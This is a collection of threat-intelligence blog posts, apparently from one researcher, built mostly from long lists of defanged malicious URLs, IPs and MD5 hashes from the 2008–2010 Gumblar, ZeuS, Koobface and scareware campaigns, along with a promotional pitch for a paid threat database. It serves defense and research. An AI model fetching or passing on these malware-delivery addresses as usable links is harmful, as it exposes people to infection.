• [403]Cybercrime-friendly VPN service provider pitches itself as being ‘recommended by Edward Snowden’

• [404]Commercial Windows-based compromised Web shells management application spotted in the wild

• [405]Compromised legitimate Web sites expose users to malicious Java/Symbian/Android “Browser Updates”

• [406]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side

exploits – part two

• [407]How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, SoundCloud and Google+’s

ToS

• [408]Tumblr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account registration tools

• [409]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof

hosting capabilities – part three

• [410]Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC)

• [411]Fake ‘WhatsApp Missed Voicemail’ themed emails lead to pharmaceutical scams

• [412]A peek inside the booming underground market for stealth Bitcoin/Litecoin mining tools

• [413]Cybercrime Trends 2013 – Year in Review

22. January - 2014

• [414]‘Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed malicious spam campaigns

intercepted in the wild

• [415]Vendor of TDoS products resets market life cycle of well known 3G USB modem/GSM/SIM card-based

TDoS tool

• [416]New TDoS market segment entrant introduces 96 SIM cards compatible custom GSM module, positions

itself as market disruptor

• [417]DIY Python-based mass insecure WordPress scanning/exploting tool with hundreds of pre-defined exploits

spotted in the wild

• [418]Google’s reCAPTCHA under automatic fire from a newly launched reCAPTCHA-solving/breaking service

• [419]Fully automated, API-supporting service, undermines Facebook and Google’s ‘SMS/Mobile number acti-

vation’ account registration process
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• [420]Newly launched managed ‘compromised/hacked accounts E-shop hosting as service’ standardizes the

monetization process

• [421]Newly released Web based DDoS/Passwords stealing-capable DIY botnet generating tool spotted in the

wild

• [422]Cybercriminals release new Web based keylogging system, rely on penetration pricing to gain market share

23. February - 2014

• [423]Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application

• [424]Market leading ‘standardized cybercrime-friendly E-shop’ service brings 2500+ boutique E-shops online

• [425]Managed TeamViewer based anti-forensics capable virtual machines offered as a service

• [426]Malicious campaign relies on rogue WordPress sites, leads to client-side exploits through the Magnitude

exploit kit

• [427]‘Hacking for hire’ teams occupy multiple underground market segments, monetize their malicious ‘know

how’

• [428]DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure

• [429]Spamvertised ‘Image has been sent’ Evernote themed campaign serves client-side exploits

• [430]Spamvertised ‘You received a new message from Skype voicemail service’ themed emails lead to Angler

exploit kit

24. March - 2014

• [431]Deceptive ads expose users to PUA.InstallBrain/PC Performer PUA (Potentially Unwanted Application)

• [432]Managed Web-based 300 GB/s capable DNS amplification enabled malware bot spotted in the wild

• [433]Commercial Windows-based compromised Web shells management application spotted in the wild – part

two

• [434]Multiple spamvertised bogus online casino themed campaigns intercepted in the wild

• [435]5M+ harvested Russian mobile numbers service exposes fraudulent infrastructure

• [436]Socks4/Socks5 enabled hosts as a service introduces affiliate network based revenue sharing scheme

• [437]A peek inside a modular, Tor C &C enabled, Bitcoin mining malware bot

• [438]Managed anti-forensics IMEI modification services fuel growth in the non-attributable TDoS market seg-

ment

• [439]Commercially available database of 52M+ ccTLD zone transfer domains spotted in the wild

• [440]Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs (Potentially Unwanted

Applications)
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• [441]DIY automatic cybercrime-friendly ‘redirector generating’ service spotted in the wild – part two

• [442]Managed DDoS WordPress-targeting, XML-RPC API abusing service, spotted in the wild

24. May - 2014

• [443]Legitimate software apps impersonated in a blackhat SEO-friendly PUA (Potentially Unwanted Application)

serving campaign

• [444]DIY cybercrime-friendly (legitimate) APK injecting/decompiling app spotted in the wild

• [445]Malicious DIY Java applet distribution platforms going mainstream – part two

• [446]Spamvertised ‘Error in calculation of your tax’ themed emails lead to malware

• [447]A peek inside a subscription-based DIY keylogging based type of botnet/malware generating tool

• [448]Spamvertised ‘Notification of payment received’ themed emails lead to malware

• [449]Malicious JJ Black Consultancy ‘Computer Support Services’ themed emails lead to malware

• [450]A peek inside a newly launched all-in-one E-shop for cybercrime-friendly services

• [451]Long run compromised accounting data based type of managed iframe-ing service spotted in the wild

Enjoy!
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Introducing Threat Data - The World’s Most Comprehensive Threats Database (2018-09-20 16:30)

Dear blog readers, I wanted to take the time and effort and introduce you to Threat Data - the World’s Most Compre-

hensive Threats Database, a proprietary invite-only MISP-based data information and knowledge sharing community

managed and operated by me which basically represents the vast majority of proprietary threat intelligence research

that I produce on a daily basis these days.

Users and organizations familiar with my research may be definitely interested in considering the opportunity

to obtain access to Threat Data including a possible sample including a possible trial of the service.

Find below a sample FAQ about Threat Data and consider obtaining access to ensure that you and your orga-

nization remains on the top of its game including ahead of current and emerging threats.

01. How to request access including a possible trial including API access?
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Approach me at ddanchev@cryptogroup.net

02. How do obtain automated access?

The database is delivered daily/weekly/quarterly in MISP-friendly JSON-capable format including STIX coverage.

03. How to request a sample?

Users interested in requesting a sample can approach me at dancho.danchev@hush.com and I’d be more than happy

to offer a recent threat intelligence research snapshot.

04. Tell me more about the pricing options?

Monthly subscriptions covering daily weekly and monthly updates start at $4,000 including guaranteed access to

24-32 analysis on a daily basis including active in-house all-source analysis guaranteeing that your organization

remains on the top of its game by possessing the necessary data information and knowledge to stay ahead of current

and emerging threats.

05. What does the database cover?

- Russian Business Network coverage

- Koobface Botnet coverage

- Kneber Botnet coverage

- Hundreds of IOCs (Indicators of Compromise)

- Tactics Techniques and Procedures In-Depth Coverage

- Malicious and fraudulent infrastructure mapped and exposed

- Malicious and fraudulent Blackhat SEO coverage

- Malicious spam and phishing campaigns

- Malicious and fraudulent scareware campaigns

- Malicious and fraudulent money mule recruitment scams

- Malicious and fraudulent reshipping mule recruitment scams

- Web based mass attack compromise fraudulent and malicious campaigns

- Malicious and fraudulent client-side exploits serving campaigns

The database also offers active malverising, scareware, rogueware, malware, phishing, spam, IM malware, mo-

bile malware, mac OS X malware, android malware, blackhat SEO, money mule recruitment, reshipping mule

recruitment, including ransomware coverage.

06. How often does it update?

Updates as issued on a daily weekly monthly basis guaranteeing unlimited access to in-house analysis all-source

analysis guaranteeing access to daily weekly and monthly updates.

Enjoy!
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Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected (2018-10-19 18:17)

In 2008 it became evident that a widespread malware-embedded attack took place successfully affecting hundreds

of iPowerWeb customers potentially exposing hundreds of legitimate Web sites to a multi-tude of malicious software

courtesy of a well known [1]Russian Business Network’s hosting provider - HostFresh.

In this post we’ll profile the campaign provide actionable intelligence on the infrastructure behind it and dis-

cuss in-depth the tactics techniques and procedures of the cybercriminals behind it. We’ll also establish a direct

connection between the campaign’s infrastructure and the [2]Russian Business Network.

Malicious URL: hxxp://58.65.232.33/gpack/index.php

Related malicious URls known to have participated in the campaign - hxxp://58.65.232.25/counter/getexe.php?h-

=11 hxxp://58.65.232.25/counter/getfile.php?f=pdf

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

2. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
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Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits (2018-10-19 22:46) According to [1]security researchers the [2]Gumblar botnet is making a comeback successfully affecting thousands of users globally potentially compromising the confidentiality availability and integrity of the targeted host to a

multi-tude of malicious client-side exploits serving domains further dropping malicious software on the affected hosts.

In this post we’ll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tac-

tics techniques and procedures of the cybercriminals behind it.

Malicious URLs known to have participated in the campaign:

hxxp://ncenterpanel.cn/php/unv3.php

hxxp://ncenterpanel.cn/php/p31.php

Related malicious MD5s known to have participated in the campaign:

MD5: 3f5b905c86d4dcaab9c86eddff1e02c7

MD5: 61461d9c9c1954193e5e0d4148a81a0c

MD5: 65cd1da3d4cc0616b4a0d4a862a865a6

MD5: 7de29e5e10adc5d90296785c89aeabce

Sample URL redirection chain:

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.comi

hxxp://gumblar.cn/rss/?id=2

hxxp://gumblar.cn/rss/?id=3

Related malicious domains known to have participated in the campaign:

hxxp://martuz.cn - 95.129.145.58

With Gumblar making a come-back it’s becoming evident that cybercriminals continuing utilizing the usual set

of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of

thousands of legitimate Web sites in a cost-effective and efficient way.

We’ll continue monitoring the campaign and post updates and post updates as soon as new developments

take place.

1. https://en.wikipedia.org/wiki/Gumblar

2. https://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity
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Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22)

In this post I’ll profile a currently circulating circa 2008 malicious and fraudulent scareware-serving campaign success-

fully enticing users into interacting with rogue and fraudulent fake security software with the cybercriminals behind

the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts

largely relying on the utilization of an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have participated in the campaign:

hxxp://globals-advers.com

hxxp://alldiskscheck300.com

hxxp://multisearch1.com

hxxp://myfreespace3.com

hxxp://hottystars.com

hxxp://multilang1.com

hxxp://3gigabytes.com

hxxp://drivemedirect.com

hxxp://globala2.com/soft.php

hxxp://teledisons.com

hxxp://theworldnews5.com

hxxp://virtualblog5.com

hxxp://grander5.com

hxxp://5starsblog.com

hxxp://globalreds.com

hxxp://global-advers.com

hxxp://ratemyblog1.com

hxxp://greatvideo3.com

hxxp://beginner2009.com

hxxp://fastwebway.com

hxxp://blazervips.com

hxxp://begin2009.com

hxxp://megatradetds0.com

hxxp://securedonlinewebspace.com

hxxp://proweb-info.com

hxxp://security-www-clicks.com

hxxp://updatedownloadlists.com

hxxp://styleonlyclicks.cn

hxxp://informationgohere.com

hxxp://world-click-service.com

hxxp://secutitypowerclicks.cn

hxxp://securedclickuser.cn

hxxp://slickoverview.com

hxxp://viewyourclicks.com

hxxp://clickwww2.com

hxxp://clickadsystem.com

hxxp://becomepoweruser.cn

hxxp://clickoverridesystem.cn

Related malicious domains known to have participated in the campaign:

hxxp://protecteduser.cn

hxxp://internetprotectedweb.com
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hxxp://clicksadssystems.com

hxxp://whereismyclick.cn/

hxxp://trustourclicks.cn

hxxp://goldenstarclick.cn

hxxp://defendedsystemuser.cn

Related malicious domains known to have participated in the campaign:

hxxp://drivemedirect.com

hxxp://virtualblog5.com

hxxp://fastwebway.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Calling Zeus Home (2018-10-20 20:25)

Remember ZeuS? The infamous crimeware-in-the-middle exploitation kit? In this post I’ll provide historical OSINT

on various ZeuS-themed malicious and fraudulent campaigns intercepted throughout 2008 and provide actionable

intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:

hxxp://myxaxa.com/z/cfg.bin

hxxp://dokymentu.info/zeus/cfg.bin

hxxp://online-traffeng.com/zeus/cfg.bin

hxxp://malwaremodel.biz/zeus/cfg.bin

hxxp://giftcardsbox.com/web/cfg.bin

hxxp://d0rnk.com/cfg.bin

hxxp://rfs-group.net/cool/cfg.bin

hxxp://62.176.16.19/11/cfg.bin

hxxp://81.95.149.74/demo/cfg.bin

hxxp://66.235.175.5/.cs/cfg.bin

hxxp://208.72.169.152/web/cfg.bin

hxxp://antispyware-protection.com/web/cfg.bin

hxxp://s0s1.net/web/cfg.bin

hxxp://208.72.169.151/admin/cfg.bin

hxxp://1ntr0.com/zuzu/cfg.bin

hxxp://88.255.90.170/bt/fiz/cfg.bin

hxxp://58.65.235.4/web/conf/cfg.bin

hxxp://forgoogleonly.cn/open/cfg.bin

hxxp://194.1.152.172/11/cfg.bin

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

48





Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28)

It’s 2008 and I’m stumbling upon yet another decent portfolio of compromised malware-serving Chinese government

Web sites. In this post I’ll discuss in-depth the campaign and provide actionable intelligence on the infrastructure

behind it.

Compromised Chinese government Web site:

hxxp://nynews.gov.cn

Sample malicious domains known to have participated in the campaign:

hxxp://game1983.com/index.htm

hxxp://sp.070808.net/23.htm

hxxp://higain-hitech.com/mm/index.html

Currently affected Chinese government Web sites:

hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.b110b.com/chbr/110.htm?id=884191

hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzc12.kki.cn/indax.htm

hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm

hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29)

It’s 2010 and I’ve recently intercepted a wide-spread Bebo malicious malware-serving campaign successfully enticing

users into interacting with the fraudulent and malicious content potentially compromising the confidentiality

availability and integrity of the targeted host to a multi-tude of malicious software.

Sample malicious domains known to have participated in the campaign:

hxxp://boss.gozbest.net/xd.html - 216.32.83.110

hxxp://tafficbots.com/in.cgi?6

hxxp://bolapaqir.com/in.cgi?2

hxxp://mybig-porn.com/promo4/?aid=1339

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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HIstorical OSINT - PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circu-

lating (2018-10-20 22:10)

It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent malware-serving spam

campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious

software found on the compromised hosts in combination with a currently active Twitter malware-serving campaign

successfully enticing users into interacting with the rogue and bogus content.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign and provide action-

able intelligence on the infrastructure behind it.

Sample malicious domains known to have participated in the campaign:

hxxp://PhishTube-Broadcast-811.5a5.us

hxxp://Sony-195.5us.us

hxxp://Hummer-631.5a5.us

hxxp://PS3-502.24dat.com

hxxp://PS3-843.5us.us

hxxp://Air-France-133.5a5.us

hxxp://PS3-519.5a5.us

hxxp://Sony-918.24dat.us

hxxp://Natal-29.5a5.us

Sample malicious domains known to have participated in the campaign:

hxxp://su7.us/tds/go.php?sid=1

Sample URL redirection chain:

http://66.199.229.253/etds/go.php?sid=4 -> -> http://mybig-porn.com/promo1/?aid=1470 ->

hxxp://online-adult-directory.com/?aid=10012 -> hxxp://yourdatingnetwork.com/?aid=697

Sample malware known to have participated in the campaign:

MD5: a4ff9c2b4fd6917d12e962a7b6173143
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Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild

(2018-10-20 22:28)

It’s 2010 and I’ve recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang

successfully exposing hundreds of thousands of users to a multi-tude of malicious software.

In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss in the depth the tac-

tics techniques and procedures of the cybercriminals behind it.

Sample domains known to have participated in the campaign:

hxxp://jhpegdueeunz.55fast.com

hxxp://vzhusyeeaubk.55fast.com

hxxp://cvzizliiustw.55fast.com

hxxp://zetaswuiouax.55fast.com

hxxp://shzopfioarpd.55fast.com

hxxp://nqpubruioeat.55fast.com

hxxp://krrepteievdr.55fast.com

hxxp://gtoancoiuyqv.55fast.com

hxxp://felopfooaydk.55fast.com

hxxp://dknejxaeozjb.55fast.com

hxxp://ljperwaaoxjs.55fast.com

hxxp://hxmagxaeulbn.55fast.com

hxxp://mueombooikgp.55fast.com

hxxp://gluezneoolhs.55fast.com

hxxp://ptpodseeanvk.55fast.com

hxxp://jgdeyraoojdr.55fast.com

hxxp://kjsetqaoojdr.55fast.com

hxxp://kvuelveuicmn.55fast.com

hxxp://ywoamnooikfp.55fast.com

hxxp://dnkopgioawss.55fast.com

hxxp://qjtepyaoigts.55fast.com

hxxp://fdsudpeeewam.55fast.com

hxxp://qumobxoiigst.55fast.com

hxxp://fkvahzaeibbz.55fast.com

hxxp://lxxikhiuutwm.55fast.com

hxxp://meboczoiikgy.55fast.com

hxxp://mevoxliiidyq.55fast.com

hxxp://hxvoysaoozhp.55fast.com

hxxp://wiaabcoookfs.55fast.com

hxxp://wlbatgeeiohc.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://narezxaauggf.55fast.com

hxxp://gdsetqaoocks.55fast.com

hxxp://ptxihhiiihpq.55fast.com

hxxp://ramilhueamxg.55fast.com

hxxp://vvnoxliiigsp.55fast.com

hxxp://ywweypeaeemz.55fast.com

hxxp://rqqetweeupwn.55fast.com

hxxp://fprewmaoojpn.55fast.com
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hxxp://kbmahjiiigpw.55fast.com

hxxp://romozjuuurov.55fast.com

hxxp://tmxufseaacks.55fast.com

hxxp://viaegjiooeun.55fast.com

hxxp://znmasdiiicbc.55fast.com

hxxp://gdbiczooaoaw.55fast.com

hxxp://boqegkooouom.55fast.com

hxxp://xncoxloiiwrm.55fast.com

hxxp://flxowreuuhkb.55fast.com

hxxp://zzkihgiuupwb.55fast.com

hxxp://gxcobmeeuvls.55fast.com

hxxp://wygimweuizxz.55fast.com

hxxp://winowmeaoxhy.55fast.com

hxxp://hhpewmaoidtm.55fast.com

hxxp://nemoxloiixlh.55fast.com

hxxp://bvbowvooigtq.55fast.com

hxxp://pgmassuiixvx.55fast.com

hxxp://vbxoxkiiijst.55fast.com

hxxp://clnobhaoobzf.55fast.com

hxxp://proawnaoozxf.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://romwrpueerr.007gb.com

hxxp://rtperweaauux.5nxs.com

hxxp://prougpeeabzd.hostevo.com

hxxp://stwermoiigwc.10fast.net

hxxp://znmasdiiicbc.55fast.com

hxxp://gjxotyuuobmv.007sites.com

Sample malicious domains known to have participated in the campaign:

hxxp://dpfujhiuijhd.hostevo.com

hxxp://gfhizliiikjd.hostevo.com

hxxp://driozkuueqic.hostevo.com

hxxp://rrkihfuuuspr.hostevo.com

hxxp://xzkikhueeivf.hostevo.com

hxxp://trqawmaookgp.hostevo.com

hxxp://hggudseuerqn.hostevo.com

hxxp://phveflaeulmn.hostevo.com

hxxp://cvxiljiuuyrm.hostevo.com

hxxp://fdseffuueqiv.hostevo.com

hxxp://dsteyraaaxgr.hostevo.com

hxxp://pfjocbeuiznb.hostevo.com

hxxp://ccziljiuurab.hostevo.com

Sample malicious domains known to have participated in the campaign:

hxxp://jgfuspeeeauc.hostevo.com

hxxp://grioxhueoxlf.hostevo.com

hxxp://dpdilkiiihfy.hostevo.com

hxxp://miuonbaoifwv.hostevo.com

hxxp://fpteymoiuqmj.hostevo.com
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hxxp://dyoovziuebvj.hostevo.com

hxxp://rpdojzaaesgg.hostevo.com

hxxp://zzkuhguuewib.hostevo.com

hxxp://bqyunruiaecw.hostevo.com

hxxp://sruoljiuurqb.hostevo.com

hxxp://stratreaaebk.hostevo.com

hxxp://kjsetwaookdt.hostevo.com

hxxp://prougpeeabzd.hostevo.com

hxxp://nrfitdioaoyd.hostevo.com

hxxp://cxligdueewoc.hostevo.com

hxxp://tqaawmaoamvj.hostevo.com

hxxp://qunoxliiifyw.hostevo.com

hxxp://zkfusteaanch.hostevo.com

hxxp://qumobcooozjf.hostevo.com

hxxp://sqqawmaaamvj.hostevo.com

hxxp://klguyraoojdr.hostevo.com

hxxp://fspespueeiez.hostevo.com

hxxp://sjcadjoaepfh.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://sjcadjoaepfh.55fast.com

hxxp://pkbadlaeujcv.55fast.com

hxxp://vnvocziiifst.55fast.com

hxxp://wauanbooikfy.55fast.com

hxxp://yovikdeaanch.55fast.com

hxxp://jvuelvaeukcc.55fast.com

hxxp://lkgufpeeaunz.55fast.com

hxxp://kjfufseeeiml.55fast.com

hxxp://bmmoxliiifdt.55fast.com

hxxp://nqtuxneuixbb.55fast.com

hxxp://wioabnaoikfp.55fast.com

hxxp://ssdikzaaaiiq.55fast.com

hxxp://rwaammaaeowm.55fast.com

hxxp://ljifsueaumz.55fast.com

Sample malicious domains known to have participated in the campaign:

hxxp://lljifsueaumz.55fast.com

hxxp://nbzigpeaoksq.55fast.com

hxxp://mvjufraoidqb.55fast.com

hxxp://hgdupraoisqc.55fast.com

hxxp://khdudseeeauc.55fast.com

hxxp://fspetwaaabxh.55fast.com

hxxp://tqoavxoiidyq.55fast.com

hxxp://xeaubwuiardg.55fast.com

hxxp://nbvoncooolhp.55fast.com

hxxp://wexigpaoambl.55fast.com

hxxp://klhuggiuufdt.55fast.com

hxxp://dxwetteoigst.55fast.com

hxxp://glvashoaeygj.55fast.com

hxxp://xmoejcaeujxc.55fast.com
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Sample malicious domains known to have participated in the campaign:

hxxp://jfsfkfuueqw.007gb.com

hxxp://bbxcimoiify.007gb.com

hxxp://ljgjxkueewi.007gb.com

hxxp:///xzkgkguueaa.007gb.com

hxxp://wmhjvkuaabj.007gb.com

hxxp://yqbzmciuupt.007gb.com

hxxp://lvxvieaoizj.007gb.com

hxxp://srnvuioookf.007gb.com

hxxp://melhlhueeqe.007gb.com

hxxp://lkhjclueuwa.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://lkhjclueuwa.007gb.com

hxxp://bvgsfyaooxh.007gb.com

hxxp://xbkhceeuifd.007gb.com

hxxp://ywncmvoiojf.007gb.com

hxxp://kjptpwaaacl.007gb.com

hxxp://gpmcumooavx.007gb.com

hxxp://dpwnaioookf.007gb.com

hxxp://stqnaiaoihd.007gb.com

hxxp://fspygfuuerq.007gb.com

hxxp://wbgtsyeaamb.007gb.com

hxxp://fprmwoaaavl.007gb.com

hxxp://mmxlnvoiijd.007gb.com

hxxp://vvllnmooocl.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://vvllnmooocl.007gb.com

hxxp://zlgsgpeaabz.007gb.com

hxxp://ccjfxleeewq.007gb.com

hxxp://cvhfjguueqi.007gb.com

hxxp://lhprsraaack.007gb.com

hxxp://razzbciiupt.007gb.com

hxxp://rancoeooozh.007gb.com

hxxp://muczimoooxh.007gb.com

hxxp://tphotdioetdf.hostevo.com

hxxp://vvxifpeaocks.hostevo.com

hxxp://jjhillooolhf.hostevo.com

hxxp://bzxixliiudpr.hostevo.com

hxxp://xmvovxooozhp.hostevo.com

hxxp://proocziuuprm.hostevo.com

hxxp://qebovziuuswb.hostevo.com

hxxp://xzhusteaabzs.hostevo.com

hxxp://bbbovxiuifyq.hostevo.com

Sample malicious domains known to have participated in the campaign:

hxxp://dpretqaoocjy.hostevo.com

hxxp://ywaaqbaoozjs.5nxs.com
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hxxp://fsyepteaaenl.5nxs.com

hxxp://jhgufpeeeaic.5nxs.com

hxxp://dsterqaaoczg.5nxs.com

hxxp://rivilhueeiuc.5nxs.com

hxxp://znouxneuaayd.5nxs.com

hxxp://kkgijguueonh.5nxs.com

hxxp://khsamvooihdt.5nxs.com

hxxp://nncikgueaflg.5nxs.com

hxxp://fdpixnaaaoiv.5nxs.com

hxxp://zzzikhiiihfy.5nxs.com

hxxp://sqaayteaaimz.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://tquambooilhs.5nxs.com

hxxp://gdtaqboiojdt.5nxs.com

hxxp://queoxliuudtq.5nxs.com

hxxp://vbcokloiikhs.5nxs.com

hxxp://raoadpiuigst.5nxs.com

hxxp://qevijfueeibj.5nxs.com

hxxp://kjlicvoooncj.5nxs.com

hxxp://sroavlueeixd.5nxs.com

hxxp://xxlijkiuuyqm.5nxs.com

hxxp://vvcijreaaenl.5nxs.com

hxxp://zzkigdueurab.5nxs.com

hxxp://zxkigdueeoel.5nxs.com

hxxp://tqoanvooijfy.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://wnxufpeaaevj.5nxs.com

hxxp:///ptaamboiihsw.5nxs.com

hxxp://vbxijhueurix.5nxs.com

hxxp://fpkijxiiidox.5nxs.com

hxxp://streqwaooxcg.5nxs.com

hxxp://ptyewmaoolgy.5nxs.com

hxxp://hgyeqboiihpw.5nxs.com

hxxp://cxjijgueeaez.5nxs.com

hxxp://woeobvoiihdt.5nxs.com

hxxp://bcxixjueuqmj.5nxs.com

hxxp://mmvobxoiihdr.5nxs.com

hxxp://prqawnaoozgy.5nxs.com

hxxp://xzkugsueeunk.5nxs.com

hxxp://vvbovxiiidym.5nxs.com

hxxp://qinozkiuidyw.5nxs.com

hxxp://tpdumweuughh.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://tpdumweuughh.5nxs.com

hxxp://zkfudpeaaech.5nxs.com

hxxp://vvcijfueeamk.5nxs.com

hxxp://jkhihdiuuypw.5nxs.com
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hxxp://womancoiuyav.5nxs.com

hxxp://sfkoyfooepgh.5nxs.com

hxxp://zzhetqaooxkd.5nxs.com

hxxp://czjudyeaacjp.5nxs.com

hxxp://gssudpeaaecg.5nxs.com

hxxp://wiuobvooozjp.5nxs.com

hxxp://twaamnaookhd.5nxs.com

hxxp://bbvocloiigsr.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://dspugduuuytm.5nxs.com

hxxp://kljigdueeqic.5nxs.com

hxxp://gpioxhuuutav.5nxs.com

hxxp://wouavcooiyil.5nxs.com

hxxp://mevoxliuuyrm.5nxs.com

hxxp://xvcocxoiojfy.5nxs.com

hxxp://zljudyeaaunl.5nxs.com

hxxp://woaabcoiusst.5nxs.com

hxxp://dppudpeeewmh.5nxs.com

hxxp://zzhustueequk.5nxs.com

hxxp://quboczoiolgd.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://kdwetmoiuics.5nxs.com

hxxp://jgfudseeerqb.5nxs.com

hxxp://qunolhueeonx.5nxs.com

hxxp://khdusyeaaeez.5nxs.com

hxxp://bvcikgueequx.5nxs.com

hxxp://xzjupteaovzg.5nxs.com

hxxp://rmludpueoebj.5nxs.com

hxxp://pfyupteeeauz.5nxs.com

hxxp://qqreqnoeewhs.5nxs.com

hxxp://ysfuyraaaczs.5nxs.com

hxxp://ljdudyeaamcj.5nxs.com

hxxp://vbvovziiustm.5nxs.com

hxxp://gffugdueeibz.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://bnjdzkiuuyw.007gb.com

hxxp://dpppdpeeeii.007gb.com

hxxp://zzfdhdeeeoe.007gb.com

hxxp://hhhhzciuusa.007gb.com

hxxp://dpmlbkiuuta.007gb.com

hxxp://ccgsgpeaaev.007gb.com

hxxp://vbzxecoiuso.007gb.com

hxxp://nbkfhdeaack.007gb.com

hxxp://bmvcaoeeaoe.007gb.com

hxxp://xchfggiuewq.007gb.com

hxxp://jgypgpeaoxh.007gb.com
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Sample malicious domains known to have participated in the campaign:

hxxp://jgypgpeaoxh.007gb.com

hxxp://hdstpraoojd.007gb.com

hxxp://nnkkvziiigh.007gb.com

hxxp://qwyduquuoeo.007gb.com

hxxp://jhgdkzooobn.007gb.com

hxxp://ljyqweoiihf.007gb.com

hxxp://xzfdfsueaux.007gb.com

hxxp://kjfhzjueeae.007gb.com

hxxp://tanbuoeaanb.007gb.com

hxxp://rammooaaocx.007gb.com

hxxp://gsmxmlueoht.007gb.com

hxxp://xxjgkguueuu.007gb.com

hxxp://jgppfpeeaev.007gb.com

hxxp://xzfpfpeaozh.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://khsphdueaev.007gb.com

hxxp://wabnieoiikg.007gb.com

hxxp://rojshgeoisw.007gb.com

hxxp://zlhffgueaec.007gb.com

hxxp://quxxmnoiokd.007gb.com

hxxp://rpsdkzoeeqq.007gb.com

hxxp://rozfksaoiht.007gb.com

hxxp://vvzkcviiuru.007gb.com

hxxp://ptgdghueedq.007gb.com

hxxp://xvjhcliuufi.007gb.com

hxxp://ywqntweaeqo.007gb.com

hxxp://mubwqaaaoxl.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://quzjlgueeib.007gb.com

hxxp://fdyttteeaou.007gb.com

hxxp://xxjggseeeom.007gb.com

hxxp://robvimoiikg.007gb.com

hxxp://hgspsyeeanx.007gb.com

hxxp://nbzkckueein.007gb.com

hxxp://syfdgmoiipy.007gb.com

hxxp://nmkjzjueequ.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://nmkjzjueequ.007gb.com

hxxp://ytwqyteaaen.007gb.com

hxxp://kgdfkhuuuyq.007gb.com

hxxp://zbcvieaoocc.007gb.com

hxxp://sywrdpeeeie.007gb.com

hxxp://prnmwaaaamm.007gb.com

hxxp://djddhfuuilc.007gb.com

hxxp://wibnuboiusw.007gb.com

hxxp://muclmboiigd.007gb.com
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hxxp://vvlkevoiidy.007gb.com

hxxp://xhprrteaaun.007gb.com

hxxp://bncvoeaaauu.007gb.com

Sample malicious domains known to have participated in the campaign:

hxxp://ravhzluuewo.007gb.com

hxxp://gsywptaaabz.007gb.com

hxxp://xxkzbcoiijd.007gb.com

hxxp://mevirwaaovlf.hostevo.com

hxxp://roboxloiihdt.007sites.com

hxxp://rauonbooozkf.007sites.com

hxxp://ywiatreeewam.007sites.com

hxxp://nxfetmaoolfr.007sites.com

hxxp://gkmelbeuoear.007sites.com

hxxp://mmcigsueeexg.007sites.com

hxxp://vxxiljoioxxg.10fast.net

hxxp://jgsuspeeeaic.10fast.net

hxxp://qenocxiiihsr.10fast.net

hxxp://lklilliiigdt.10fast.net

hxxp://hgdepreaamzs.10fast.net

Sample malicious domains known to have participated in the campaign:

hxxp://gffupteaaebj.10fast.net

hxxp:///kljigfuuugfp.10fast.net

hxxp://raianvoiokgy.10fast.net

hxxp://rtqerqeaamcg.10fast.net

hxxp://gfdugdeaavls.10fast.net

